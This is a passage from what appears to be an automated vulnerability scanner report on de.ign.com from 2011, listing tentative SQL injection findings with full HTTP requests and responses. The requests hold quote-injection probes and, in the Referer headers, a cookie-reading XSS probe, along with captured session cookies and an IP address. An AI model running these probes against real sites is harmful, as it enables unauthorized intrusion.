MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.3.10.1297040497;

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:15:52 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,2747,4602,4603,4723,4897,4917,4954,5031,5718,5745,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6671,10619&Values=25,46,60,72,80,91,101,110,150,152,222,288,531,757,912,1187,1405,1481,1591,1824,2337,2986,3887,3932,4056,4227,4662,4799,5999,6623,8151,8210,8978,9180,41899,61350,61578,61766,61919,65369&RawValues=&random=cwfxRKn,bguRregbdnkiy/ HTTP/1.1
Host: de.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040561490v-1n-12mc+1297040561491mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=10089; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; decc=US; NGUserID=a016c06-15003-1306593845-5; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.3.10.1297040497;

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:15:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:15:52 GMT
Connection: close


1.24. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,2747,4602,4603,4723,4897,4917,4954,5031,5718,5745,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6671,10619&Values=25,46,60,72,80,91,101,110,150,152,222,288,531,757,912,1187,1405,1481,1591,1824,2337,2986,3887,3932,4056,4227,4662,4799,5999,6623,8151,8210,8978,9180,41899,61350,61578,61766,61919,65369&RawValues=&random=dlmndoi,bguRrehbdnkof [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,2747,4602,4603,4723,4897,4917,4954,5031,5718,5745,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6671,10619&Values=25,46,60,72,80,91,101,110,150,152,222,288,531,757,912,1187,1405,1481,1591,1824,2337,2986,3887,3932,4056,4227,4662,4799,5999,6623,8151,8210,8978,9180,41899,61350,61578,61766,61919,65369&RawValues=&random=dlmndoi,bguRrehbdnkof

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,2747,4602,4603,4723,4897,4917,4954,5031,5718,5745,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6671,10619&Values=25,46,60,72,80,91,101,110,150,152,222,288,531,757,912,1187,1405,1481,1591,1824,2337,2986,3887,3932,4056,4227,4662,4799,5999,6623,8151,8210,8978,9180,41899,61350,61578,61766,61919,65369&RawValues=&random=dlmndoi,bguRrehbdnkof HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://my.ign.com/register?r=http://www.ign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; decc=US; NGUserID=a016c09-18740-885768600-2; i18n-cc=US; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; rsi_segs=; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; __utmb=173446715.1.10.1297040497

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:44:28 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,2747,4602,4603,4723,4897,4917,4954,5031,5718,5745,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6671,10619&Values=25,46,60,72,80,91,101,110,150,152,222,288,531,757,912,1187,1405,1481,1591,1824,2337,2986,3887,3932,4056,4227,4662,4799,5999,6623,8151,8210,8978,9180,41899,61350,61578,61766,61919,65369&RawValues=&random=dlmndoi,bguRrehbdnkof HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://my.ign.com/register?r=http://www.ign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; decc=US; NGUserID=a016c09-18740-885768600-2; i18n-cc=US; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; rsi_segs=; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; __utmb=173446715.1.10.1297040497

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:44:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:44:28 GMT
Connection: close
Vary: Accept-Encoding


1.25. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,2747,4602,4603,4723,4897,4917,4954,5031,5718,5745,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6671,10619&Values=25,46,60,72,80,91,101,110,150,152,222,288,531,757,912,1187,1405,1481,1591,1824,2337,2986,3887,3932,4056,4227,4662,4799,5999,6623,8151,8210,8978,9180,41899,61350,61578,61766,61919,65369&RawValues=&random=dlmndoi,bguRrehbdnkof/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,2747,4602,4603,4723,4897,4917,4954,5031,5718,5745,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6671,10619&Values=25,46,60,72,80,91,101,110,150,152,222,288,531,757,912,1187,1405,1481,1591,1824,2337,2986,3887,3932,4056,4227,4662,4799,5999,6623,8151,8210,8978,9180,41899,61350,61578,61766,61919,65369&RawValues=&random=dlmndoi,bguRrehbdnkof/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,2747,4602,4603,4723,4897,4917,4954,5031,5718,5745,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6671,10619&Values=25,46,60,72,80,91,101,110,150,152,222,288,531,757,912,1187,1405,1481,1591,1824,2337,2986,3887,3932,4056,4227,4662,4799,5999,6623,8151,8210,8978,9180,41899,61350,61578,61766,61919,65369&RawValues=&random=dlmndoi,bguRrehbdnkof/ HTTP/1.1
Host: de.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040561490v-1n-12mc+1297040561491mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=10089; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; decc=US; NGUserID=a016c06-15003-1306593845-5; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.3.10.1297040497;

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:15:54 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,2747,4602,4603,4723,4897,4917,4954,5031,5718,5745,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6671,10619&Values=25,46,60,72,80,91,101,110,150,152,222,288,531,757,912,1187,1405,1481,1591,1824,2337,2986,3887,3932,4056,4227,4662,4799,5999,6623,8151,8210,8978,9180,41899,61350,61578,61766,61919,65369&RawValues=&random=dlmndoi,bguRrehbdnkof/ HTTP/1.1
Host: de.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040561490v-1n-12mc+1297040561491mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=10089; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; decc=US; NGUserID=a016c06-15003-1306593845-5; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.3.10.1297040497;

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:15:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:15:54 GMT
Connection: close


1.26. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,2747,4602,4603,4723,4897,4917,4954,5031,5718,5749,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6671,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,288,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=ddkKKby,bguRrfrbdmWak [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,2747,4602,4603,4723,4897,4917,4954,5031,5718,5749,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6671,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,288,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=ddkKKby,bguRrfrbdmWak

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,2747,4602,4603,4723,4897,4917,4954,5031,5718,5749,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6671,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,288,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=ddkKKby,bguRrfrbdmWak HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(document.cookie)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; rsi_segs=10089; decc=US; NGUserID=a016c06-15003-1306593845-5; i18n-cc=US; freq=c-1297040561490v-1n-12mc+1297040561491mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; __utmb=173446715.3.10.1297040497

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:44:50 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,2747,4602,4603,4723,4897,4917,4954,5031,5718,5749,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6671,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,288,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=ddkKKby,bguRrfrbdmWak HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(document.cookie)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; rsi_segs=10089; decc=US; NGUserID=a016c06-15003-1306593845-5; i18n-cc=US; freq=c-1297040561490v-1n-12mc+1297040561491mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; __utmb=173446715.3.10.1297040497

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:44:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:44:50 GMT
Connection: close
Vary: Accept-Encoding


1.27. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,2747,4602,4603,4723,4897,4917,4954,5031,5718,5749,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6671,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,288,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bwmijfx,bguRragewbmAI [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,2747,4602,4603,4723,4897,4917,4954,5031,5718,5749,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6671,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,288,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bwmijfx,bguRragewbmAI

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,2747,4602,4603,4723,4897,4917,4954,5031,5718,5749,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6671,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,288,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bwmijfx,bguRragewbmAI HTTP/1.1
Host: de.ign.com
